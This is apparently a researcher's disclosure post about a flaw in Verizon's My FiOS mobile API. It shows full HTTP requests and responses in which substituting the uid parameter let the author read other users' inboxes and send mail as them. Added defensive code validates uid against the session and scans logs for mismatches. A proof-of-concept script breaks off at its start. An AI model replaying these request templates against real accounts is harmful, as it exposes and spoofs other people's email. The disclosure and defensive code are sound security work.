Critical Vulnerability in Verizon Mobile API Compromising User Email Accounts

As a Verizon FiOS customer, I had never used the My FiOS app for Android to manage my account. Since Verizon has a good amount of my information, I thought it would be a good candidate for research. I was right and the results were astonishing. I identified a vulnerability in one of the My FiOS web services that allowed access to any user’s Verizon email account. This included reading their inbox, individual messages, and even sending on their behalf. One can realize the seriousness of this issue, since obtaining access to someone’s email can be used to access a number of other accounts, e.g. banking, Facebook, etc.

While proxying the requests from my device, I noticed an interesting call to fetch the emails in my inbox. The result is used to populate an inbox preview on the main screen of the app, shown here:

And here’s the corresponding web request:

GET http://www.verizon.com/mobilesvc/messagecenter/members/service/getEmail?format=json&uid=RWESTERGREN05&failOverSize=25&failOverStart=0&fid=INBOX HTTP/1.1
Host: www.verizon.com
Connection: Keep-Alive
Cookie: dotcomsid=***REMOVED***; webmailssoID=***REMOVED***
Cookie2: $Version=1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SCH-I545 Build/KOT49H) appversioncode [9121]
devId: 4d6acc45e433f97f
appId: com.verizon.oxygen
appVer: v2.10.11-9121
os: ANDROID
osVer: 4.4.2
csid: ***REMOVED***
model: samsung:SCH-I545
cid: Verizon Wireless
net: TYPE_WIFI
sid: RWESTERGREN05
pd: 
userinfo: ***REMOVED***

It was interesting to see two direct references to my username, particularly this parameter: getEmail?format=json&uid=RWESTERGREN05

The response is a JSON object containing the header information for the emails in my inbox (a shortened list for readability):

{
    "error": {
        "code": "0",
        "msg": ""
    },
    "res": {
        "batchStart": "0",
        "fid": "INBOX",
        "flush": "true",
        "folderFlags": [],
        "msgHeaderList": [
            {
                "CallerTN": null,
                "ContextID": null,
                "Duration": null,
                "ExpiryDate": null,
                "MBOX": null,
                "MessageID": null,
                "MessageType": null,
                "OrignalArrTime": null,
                "VzTN": null,
                "attachments": "false",
                "date": 1389160576000,
                "fid": "INBOX",
                "flagged": false,
                "flags": [],
                "isCertified": false,
                "isFwd": false,
                "isRe": false,
                "mid": "28",
                "num": 28,
                "priority": false,
                "recipient": {
                    "address": "",
                    "personal": ""
                },
                "reqReceipt": false,
                "returnPath": "[email protected]",
                "sender": {
                    "address": "[email protected]",
                    "personal": "Verizon Services"
                },
                "size": "24",
                "subject": "Start your New Year with an amazing deal on FiOS",
                "unread": false
            },
            {
                "CallerTN": null,
                "ContextID": null,
                "Duration": null,
                "ExpiryDate": null,
                "MBOX": null,
                "MessageID": null,
                "MessageType": null,
                "OrignalArrTime": null,
                "VzTN": null,
                "attachments": "false",
                "date": 1311269441000,
                "fid": "INBOX",
                "flagged": false,
                "flags": [],
                "isCertified": false,
                "isFwd": false,
                "isRe": false,
                "mid": "27",
                "num": 27,
                "priority": false,
                "recipient": {
                    "address": "",
                    "personal": ""
                },
                "reqReceipt": false,
                "returnPath": "[email protected]",
                "sender": {
                    "address": "[email protected]",
                    "personal": "Verizon Notifications"
                },
                "size": "13",
                "subject": "Important Changes to your Verizon Internet Account for FTP* Users",
                "unread": false
            },
            {
                "CallerTN": null,
                "ContextID": null,
                "Duration": null,
                "ExpiryDate": null,
                "MBOX": null,
                "MessageID": null,
                "MessageType": null,
                "OrignalArrTime": null,
                "VzTN": null,
                "attachments": "false",
                "date": 1256580554000,
                "fid": "INBOX",
                "flagged": false,
                "flags": [],
                "isCertified": false,
                "isFwd": false,
                "isRe": false,
                "mid": "4",
                "num": 4,
                "priority": false,
                "recipient": {
                    "address": "",
                    "personal": ""
                },
                "reqReceipt": false,
                "returnPath": "[email protected]",
                "sender": {
                    "address": "[email protected]",
                    "personal": null
                },
                "size": "3",
                "subject": "Important Information Regarding Your Verizon Online Account",
                "unread": true
            }
        ],
        "resultSize": "28",
        "timeZone": null,
        "totalMsgNum": 28,
        "totalunreadMsgNum": 0,
        "uidNext": "29",
        "uidValidity": "1250267216",
        "uids": [
            28,
            27,
            26,
            25,
            24,
            23,
            22,
            21,
            20,
            19,
            18,
            17,
            16,
            15,
            14,
            13,
            12,
            11,
            10,
            9,
            8,
            7,
            6,
            5,
            4,
            3,
            2,
            1
        ]
    }
}

Altering the uid parameter and specifying another username shouldn’t have an effect, since I’m logged in and my session is maintained through my cookies. Amazingly, this was not the case. Substituting the uid with the username of another email account indeed returned the contents of their inbox. This was enough of an issue, but I immediately questioned whether the other API methods were affected.
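The missing server-side check, as an added example that is not part of the original post and not Verizon's code: a getEmail-style handler that trusts the client-supplied uid, beside one that binds the mailbox to the account behind the session cookie. The session store, mailboxes, account names, host and function names are all hypothetical and constructed for the illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed server-side state (hypothetical): session cookie value -> account.
SESSIONS = {"sess-alice": "ALICE01", "sess-bob": "BOB02"}

# Constructed mailboxes keyed by account name.
MAILBOXES = {
    "ALICE01": [{"mid": "2", "subject": "Your bill is ready"}],
    "BOB02": [{"mid": "7", "subject": "Password reset code"}],
}

# Placeholder host; the path mirrors the getEmail call shown in the post.
BASE = "http://api.example.test/mobilesvc/messagecenter/members/service/getEmail"


def _identify(request):
    """Return (account bound to the session cookie or None, uid values sent)."""
    account = SESSIONS.get(request["cookies"].get("dotcomsid"))
    uids = parse_qs(urlsplit(request["url"]).query).get("uid", [])
    return account, uids


def get_email_vulnerable(request):
    """Verifies that *a* session exists, then selects the mailbox from the
    client-supplied uid. This is the behaviour the post describes."""
    account, uids = _identify(request)
    if account is None:
        return 401, {"error": "login required"}
    uid = uids[0] if uids else account
    return 200, {"msgHeaderList": MAILBOXES.get(uid, [])}


def get_email_hardened(request):
    """Selects the mailbox from the session only. A uid parameter is tolerated
    for client compatibility but must match the session's account."""
    account, uids = _identify(request)
    if account is None:
        return 401, {"error": "login required"}
    if len(uids) > 1:
        # Repeated parameters are a common way to confuse layered checks.
        return 400, {"error": "duplicate uid parameter"}
    if uids and uids[0] != account:
        return 403, {"error": "uid does not match authenticated account"}
    return 200, {"msgHeaderList": MAILBOXES[account]}


def make_request(cookie, uid):
    """Build a constructed request dict for the handlers above."""
    url = "%s?format=json&uid=%s&fid=INBOX" % (BASE, uid)
    return {"cookies": {"dotcomsid": cookie}, "url": url}


if __name__ == "__main__":
    cross = make_request("sess-alice", "BOB02")
    print("vulnerable:", get_email_vulnerable(cross))
    print("hardened:  ", get_email_hardened(cross))
```

The same comparison has to be applied to every method that accepts a uid, including the read and send calls, since each one resolves the mailbox independently.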

Using the returned header list, one can read individual inbox messages by substituting the corresponding mid and uid in the following GET request:

http://www.verizon.com/mobilesvc/messagecenter/members/service/reademail?format=json&uid=RWESTERGREN05&mid=28&fid=INBOX

The response:

{
    "error": {
        "code": "0",
        "msg": ""
    },
    "res": {
        "attachments": [],
        "bcc": [],
        "bodyhtml": "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n  \r\n  \r\n    <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\" bgcolor=\"#ffffff\" text=\"#373737\"><tbody><tr><td valign=\"top\">\r\n      \r\n        \r\n        \r\n        \r\n        \r\n          \r\n        \r\n        \r\n          \r\n        \r\n        \r\n          \r\n        \r\n\r\n   \r\n       \r\n<table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"center\" valign=\"top\" style=\"width:600px; border-collapse:collapse; border-spacing:0;\"><tbody><tr><td bgcolor=\"#ffffff\" colspan=\"4\" style=\"padding-top:10px; padding-left:20px; padding-right:20px; padding-bottom:5px;\">\r\n            \r\n              \r\n              \r\n                \r\n                \r\n              \r\n              <table class=\"width-260\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr valign=\"top\"><td class=\"float-left\" bgcolor=\"#ffffff\">\r\n                  \r\n                    \r\n                    \r\n                               \r\n                    \r\n                    <table width=\"360\" class=\"width-260\" bgcolor=\"#ffffff\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"middle\" style=\"font-family:verdana; font-size:9px; color:#252525; background-color:#ffffff; line-height:16px;\"><span class=\"ph\">Make 2014 your most entertaining year yet</span></td></tr></tbody></table></td><td class=\"float-left\" valign=\"top\" align=\"right\">\r\n                  \r\n                    \r\n                    \r\n                      \r\n                      \r\n                      \r\n                    <table width=\"200\" class=\"width-260\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"right\" valign=\"middle\" style=\"font-family:verdana; font-size:9px; color:#a2a2a2; background-color:#ffffff; line-height:16px;\" 
class=\"phLeftAlign\"><span class=\"phLeftAlign\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww22.verizon.com%2FForyourhome%2FMyAccount%2FUnprotected%2FUserManagement%2FLogin%2FLogin.aspx%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946634&amp;tid=31926&amp;vno=1&amp;ltid=1323227\" target=\"_blank\" style=\"color:#0066cc;text-decoration:none;text-decoration:none;\"><span style=\"color:#0066cc;text-decoration:none;text-decoration:none !important; outline:0;\">Update Email</span></a>&#160;|&#160;<a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fimages-promo.verizon.com%2FACQ%2F2013%2FJanuary_ACQ%2FJanuary_ACQ_V9_OL.html%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946635&amp;tid=31926&amp;vno=1&amp;ltid=1323228\" target=\"_blank\" style=\"color:#0066cc;text-decoration:none;text-decoration:none;\"><span style=\"color:#0066cc;text-decoration:none;text-decoration:none !important; outline:0;\">View Online</span></a></span>\r\n                              </td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" valign=\"bottom\">\r\n            \r\n              \r\n                \r\n                  \r\n                \r\n\r\n               \r\n                 \r\n                \r\n              \r\n              <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr height=\"1\"><td width=\"600\" bgcolor=\"#d2d3d4\" height=\"1\" style=\"height:1px!important;\"></td></tr><tr valign=\"top\"><td style=\"padding-left:20px; padding-right:20px; padding-bottom:10px;\">\r\n                     <a 
href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.verizon.com%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946636&amp;tid=31926&amp;vno=1&amp;ltid=1323229\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/September_CR_01.jpg\" width=\"84\" height=\"84\" border=\"0\" alt=\"Verizon\" title=\"Verizon\" style=\"display:inline-block;\" /></a>\r\n                    </td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" class=\"header-image\">\r\n            \r\n              \r\n              \r\n                \r\n                \r\n              \r\n              <table class=\"header-image\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"width:600px; border-collapse:collapse; border-spacing:0;\" width=\"600\"><tbody><tr valign=\"top\"><td class=\"float-left\" valign=\"top\">\r\n                  \r\n                    \r\n                    \r\n                      \r\n                      \r\n                      \r\n                    <table class=\"header-image\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"width:600px; border-collapse:collapse; border-spacing:0;\"><tbody><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:600px;\" class=\"header-image\">\r\n                      <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.verizon.com%2Fhome%2FMLP%2FonlineFTPOFW.html%3Fx1%3Dzlfg1936%26CMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946637&amp;tid=31926&amp;vno=1&amp;ltid=1323230\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/2013/January_ACQ/images/FDO13027-0107-ACQ(002).jpg\" alt=\"Get our lowest price of the year with FiOS\" title=\"Get our lowest price of the year with FiOS\" border=\"0\" style=\"display:block;\" class=\"header-image\" 
width=\"600\" /></a>\r\n          </td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" colspan=\"4\">\r\n             \r\n                 \r\n                   \r\n             \r\n             \r\n     \r\n         \r\n          \r\n          \r\n          \r\n          \r\n        \r\n        \r\n        <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr valign=\"top\"><td class=\"float-left\" valign=\"top\" bgcolor=\"#ecedef\" height=\"100%;\">\r\n                         \r\n                           \r\n                             \r\n                               \r\n                                   \r\n                 \r\n             <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" height=\"100%;\"><tbody><tr><td width=\"300\" valign=\"top\"><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"300\" height=\"1\" border=\"0\" style=\"display:block;\" /></td></tr></tbody></table>\r\n         </td><td class=\"float-left\" valign=\"top\" bgcolor=\"#ecedef\" height=\"100%;\">\r\n                         \r\n                           \r\n                             \r\n                               \r\n                                   \r\n                 \r\n             <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" height=\"100%;\"><tbody><tr><td width=\"300\" valign=\"top\"><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"300\" height=\"1\" border=\"0\" style=\"display:block;\" /></td></tr></tbody></table>\r\n         </td></tr><tr><td bgcolor=\"#ecedef\" colspan=\"4\" style=\"padding-bottom:20px\">\r\n            \r\n              \r\n              \r\n                \r\n                \r\n              \r\n              <table class=\"width-300\" border=\"0\" cellspacing=\"0\" 
cellpadding=\"0\" width=\"600\"><tbody><tr valign=\"top\"><td class=\"float-left\" style=\"padding-top:20px;\">\r\n                  \r\n                    \r\n                    \r\n                      \r\n                    \r\n                    <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td valign=\"bottom\" bgcolor=\"#ecedef\" style=\"width:90px;padding-left:20px; padding-right:20px;\" class=\"width-300\"><span><img src=\"http://images-promo.verizon.com/ACQ/global_images/fios_logo.png\" width=\"78\" height=\"29\" alt=\"FiOS\" title=\"FiOS\" border=\"0\" style=\"display:block; margin:0 auto;\" /></span></td></tr></tbody></table></td><td class=\"float-left\" align=\"right\" valign=\"top\" style=\"padding-top:20px;\">\r\n                  \r\n                    \r\n                      \r\n                       \r\n      \r\n                              \r\n                        \r\n                                                \r\n                        \r\n                                                \r\n                        \r\n                                                \r\n                        \r\n                        \r\n                      \r\n                    <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td width=\"29\" style=\"padding-left:20px;\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fwww.pinterest.com%2Fverizonfios%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946638&amp;tid=31926&amp;vno=1&amp;ltid=1323231\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_pinterest.png\" width=\"29\" height=\"29\" alt=\"Pinterest\" title=\"Pinterest\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" 
bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"29\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.facebook.com%2FVerizonFiOS%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946639&amp;tid=31926&amp;vno=1&amp;ltid=1323232\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_facebook.png\" width=\"29\" height=\"29\" alt=\"Facebook\" title=\"Facebook\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"29\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Ftwitter.com%2Fverizonfios%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946640&amp;tid=31926&amp;vno=1&amp;ltid=1323233\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_twitter.png\" width=\"29\" height=\"29\" alt=\"Twitter\" title=\"Twitter\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"31\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a 
href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww.youtube.com%2Fuser%2Fverizon%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946641&amp;tid=31926&amp;vno=1&amp;ltid=1323234\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_youtube.png\" width=\"31\" height=\"29\" alt=\"YouTube\" title=\"YouTube\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"31\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fplus.google.com%2F%2Bverizonfios%2Fposts%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946642&amp;tid=31926&amp;vno=1&amp;ltid=1323235\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_googleplus.png\" width=\"31\" height=\"29\" alt=\"google+\" title=\"google+\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td><td width=\"9\" bgcolor=\"#ecedef\"><span><img src=\"http://images-promo.verizon.com/OVL/2013/006_jun/Jun_M2M_Term_Email/images/spacer.gif\" width=\"9\" height=\"1\" border=\"0\" style=\"display:block;\" /></span></td><td width=\"29\" style=\"padding-right:20px;\" bgcolor=\"#ecedef\" class=\"mobile-icon\"><a 
href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fwww.verizon.com%2Fforyourhome%2FMyAccount%2Fngen%2Fupr%2Fnlogin.aspx%3FLOBCode%3DC%26PromoTCode%3DMZV07%26PromoSrcCode%3DV%26POEId%3DVU1SP%26CMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946643&amp;tid=31926&amp;vno=1&amp;ltid=1323236\" target=\"_blank\" style=\"outline:0;\"><img src=\"http://images-promo.verizon.com/ACQ/global_images/icon_verizon.png\" width=\"29\" height=\"29\" alt=\"my verizon\" title=\"my verizon\" border=\"0\" style=\"display:block; valign:center;\" class=\"mobile-icon\" /></a></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#ffffff\" colspan=\"4\">\r\n            \r\n              \r\n              \r\n                \r\n                \r\n              \r\n              <table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"600\"><tbody><tr valign=\"middle\"><td class=\"float-left\" bgcolor=\"#ffffff\" style=\"padding-bottom:20px\">\r\n                  \r\n                    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table class=\"width-300\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:560px; font-family:Arial, Helvetica, sans-serif; font-size:13px; line-height:18px; color:#959595; background-color:#ffffff; padding:20px 20px 0 20px;\" class=\"width-300\">\r\nADVERTISEMENT<br /><br />Offer for new <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> TV or Internet res. custs. 
subscribing to a <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> TV Prime HD, <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> 15/5 Mbps Internet and Verizon Freedom<span class=\"&#8220;regMark&#8221;\" style=\"&#8220;font-family:Lucida\" sans=\"Sans\" unicode=\"Unicode\" sans-serif=\"sans-serif\" important=\"important\" rdquo=\"rdquo\">&#174;</span> Essentials or <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> Digital Voice bundle online. Promo rate via $35 bill credit for 12 mos. and $5 bill credit for mos. 13-24; beg. mo. 25, stand. monthly rates apply. $3.48 Regional Sports Network Fee, &amp; other fees, taxes, equip. charges &amp; terms apply. Activation fee waived via bill credit. Subj. to credit approval &amp; may require a deposit. <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span> avail. in select areas. Actual speeds may vary. Where applicable, battery backup avail. for standard fiber-based voice service, <span style=\"text-transform:uppercase !important;\">F</span><span style=\"text-transform:lowercase !important;\">i</span><span style=\"text-transform:uppercase !important;\">OS</span><span class=\"&#8220;regMark&#8221;\" style=\"&#8220;font-family:Lucida\" sans=\"Sans\" unicode=\"Unicode\" sans-serif=\"sans-serif\" important=\"important\" rdquo=\"rdquo\">&#174;</span> Digital Voice &amp; E911 (but not other voice services). Must sign up by 1/18/14. &#169;2014 Verizon.   
<br /><br />                                                         Verizon is dedicated to protecting your privacy and will not share your email address and information with anyone. <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=http%3A%2F%2Fwww22.verizon.com%2Fabout%2Fprivacy%2F%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946644&amp;tid=31926&amp;vno=1&amp;ltid=1323237\" target=\"_blank\" style=\"color:#0066CC;text-decoration:none;\"><span style=\"color:#0066CC;text-decoration:none;outline:0;\" class=\"legal-link\">Privacy Policy</span></a> \r\n</td></tr><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:560px; font-family:Arial, Helvetica, sans-serif; font-size:13px; line-height:18px; color:#959595; background-color:#ffffff; padding:20px 20px 0 20px;\" class=\"width-300\">\r\nPlease do not reply to this email as this mailbox is not monitored. You may <a href=\"https://econtact.verizon.com/ecrm/includes/html/vzfwd.html?destination=https%3A%2F%2Fecontact.verizon.com%2Fecrm%2Funsubscribe.serv%3FCMP%3DEMC-CON_2014-Q1_MM-ACQ-eCRMTXIDFDO13027a_0120&amp;txid=B20140107_2018988596&amp;lid=946645&amp;tid=31926&amp;vno=1&amp;ltid=1323238&amp;[email protected]\" target=\"_blank\" style=\"color:#0066CC;text-decoration:none;\"><span style=\"color:#0066CC;text-decoration:none;outline:0;\" class=\"legal-link\">unsubscribe</span></a> from Verizon promotional emails at any time. Please allow up to 10 business days for Verizon to process your opt-out request.\r\n</td></tr><tr><td valign=\"top\" bgcolor=\"#ffffff\" style=\"width:560px; font-family:Arial, Helvetica, sans-serif; font-size:13px; line-height:18px; color:#959595; background-color:#ffffff; padding:20px 20px 0 20px;\" class=\"width-300\">\r\n&#169;2014 Verizon. 
All Rights Reserved.<br />\r\nVerizon Services Corp  |  One Verizon Way  |   Basking Ridge, NJ 07920\r\n</td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\r\n <img width=\"0\" height=\"0\" src=\"http://econtact.verizon.com/ecrm/EmailTracking.serv?TXID=B20140107_2018988596\" />\r\n</td></tr></tbody></table>",
        "cc": [],
        "date": 1389160576000,
        "fid": "INBOX",
        "mid": "28",
        "msgheaders": [
            {
                "CallerTN": null,
                "Date": "01/08/2014",
                "Duration": null,
                "ExpiryDate": null,
                "MessageID": null,
                "MessageType": null,
                "OriginalArrivalTime": null,
                "Subject": "Start your New Year with an amazing deal on FiOS",
                "TN": null
            }
        ],
        "sender": {
            "address": "[email protected]",
            "personal": "Verizon Services"
        },
        "subject": "Start your New Year with an amazing deal on FiOS",
        "timezone": "-21600",
        "to": [
            {
                "address": "[email protected]"
            }
        ]
    }
}

Using the same parameter substitution, one was able to read the email messages of other users. It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user. This request was also successful:

POST http://www.verizon.com/mobilesvc/messagecenter/members/service/sendEmail HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Host: www.verizon.com
Connection: Keep-Alive
Cookie: dotcomsid=***REMOVED***; webmailssoID=***REMOVED***
Cookie2: $Version=1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SCH-I545 Build/KOT49H) appversioncode [9121]
devId: 4d6acc45e433f97f
appId: com.verizon.oxygen
appVer: v2.10.11-9121
os: ANDROID
osVer: 4.4.2
csid: 1421439892800-2L29M09
model: samsung:SCH-I545
cid: Verizon Wireless
net: TYPE_WIFI
sid: RWESTERGREN05
pd: 
userinfo: ***REMOVED***

omid=&action=4&actionType=&Event=ComposeEmail&NetworkStatus=Y&fid=Inbox&uid=RWESTERGREN05&mailTo=test%40test.com&mailSub=test&mailBody=Test+outgoing&mailCC=&mailBcc=&attachment=
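For detection, the three calls above share one signature: the uid in the query string or form body differs from the account that owns the session. The following added example (not from the original post) scans constructed request-log records for that mismatch. It assumes the logging layer records a `session_user` field resolved server-side from the cookie; the record layout, account names and placeholder host are hypothetical.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

SERVICE_PREFIX = "/mobilesvc/messagecenter/members/service/"
HOST = "http://api.example.test"  # placeholder host for the constructed records

# Constructed log records. session_user is assumed to be derived server-side
# from the session cookie, never from a client-supplied header or parameter.
SAMPLE_LOG = [
    {"session_user": "ALICE01", "method": "GET", "body": "",
     "url": HOST + SERVICE_PREFIX + "getEmail?format=json&uid=ALICE01&fid=INBOX"},
    {"session_user": "MALLORY03", "method": "GET", "body": "",
     "url": HOST + SERVICE_PREFIX + "getEmail?format=json&uid=ALICE01&fid=INBOX"},
    {"session_user": "MALLORY03", "method": "GET", "body": "",
     "url": HOST + SERVICE_PREFIX + "reademail?format=json&uid=ALICE01&mid=2&fid=INBOX"},
    {"session_user": "MALLORY03", "method": "POST",
     "url": HOST + SERVICE_PREFIX + "sendEmail",
     "body": "omid=&action=4&fid=Inbox&uid=BOB02&mailTo=test%40test.com&mailSub=test"},
    {"session_user": "BOB02", "method": "GET", "body": "",
     "url": HOST + "/unrelated/page?uid=ALICE01"},
]


def requested_uids(record):
    """Return (endpoint, [uid values]) for message-center calls, else None.
    uid is collected from the query string and, for POST, the form body."""
    parts = urlsplit(record["url"])
    if not parts.path.startswith(SERVICE_PREFIX):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if record["method"] == "POST":
        form = parse_qs(record.get("body", ""), keep_blank_values=True)
        for key, values in form.items():
            params.setdefault(key, []).extend(values)
    return parts.path[len(SERVICE_PREFIX):], params.get("uid", [])


def find_cross_account_access(log):
    """Flag every record whose uid names an account other than the session's."""
    findings = []
    for index, record in enumerate(log):
        parsed = requested_uids(record)
        if parsed is None:
            continue
        endpoint, uids = parsed
        foreign = sorted({u for u in uids if u != record["session_user"]})
        if foreign:
            findings.append({"index": index,
                             "session_user": record["session_user"],
                             "endpoint": endpoint,
                             "foreign_uids": foreign})
    return findings


def sessions_touching_many_accounts(findings, threshold=2):
    """Group findings by session owner; report owners that reached at least
    `threshold` distinct foreign accounts (a sign of enumeration)."""
    touched = defaultdict(set)
    for finding in findings:
        touched[finding["session_user"]].update(finding["foreign_uids"])
    return {user: sorted(accounts) for user, accounts in touched.items()
            if len(accounts) >= threshold}


if __name__ == "__main__":
    hits = find_cross_account_access(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(sessions_touching_many_accounts(hits))
```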

The severity of this issue was immediately apparent. My next step was to write a quick proof-of-concept to demonstrate the vulnerability in preparation to send it over to Verizon.

import requests

# Valid credentials required
validUsername = "RWESTERGREN05"
validPassword = ""

# Mailbox to fetch
targetUsername = ""


def do_login(username, password):
    s = requests.Session()

